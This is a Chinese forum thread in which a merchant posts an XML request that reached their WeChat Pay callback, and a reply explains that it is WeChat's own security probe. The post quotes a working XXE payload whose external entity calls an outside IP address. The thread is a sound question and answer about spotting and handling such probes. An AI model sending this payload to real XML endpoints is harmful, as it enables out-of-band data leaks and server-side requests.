WXOPEN Club

微信支付回调接口 收到了不识别的XML文件

发布于 6 年前作者 yuanna7406 次浏览最后编辑 6 年前来自 ask

<?xml version=“1.0” encoding=“utf-8”?>

<!DOCTYPE root [<!ENTITY xxe SYSTEM 

http://101.91.62.170:4837/wx\_xxe\_dbc\_os\_2018092803\_79?aHR0cHM6Ly93d3cuamlhbmd4aW5nODg4LmNvbS9odWlTaGVuZ0h1by9hY3Rpb24vV2VpeGluUGF5Q2FsbGJhY2tBY3Rpb24vY2FsbGJhY2s=”>]>

<foo>

<value>&xxe;</value>

</foo>

收到的XML 内容是这样的  自己查了查 好像是  XXE漏洞攻击。。我也不能确认 访问这个地址 也是 404看看是不是官方给了什么东西我们漏掉了

1 回复
jiangfang
jiangfang1 楼4 年前

你好,这个是微信官方检测商户是否存在安全问题的回调,详细可以查看https://pay.weixin.qq.com/wiki/doc/api/jsapi.php?chapter=23_5,如果没有问题,可以忽略此回调。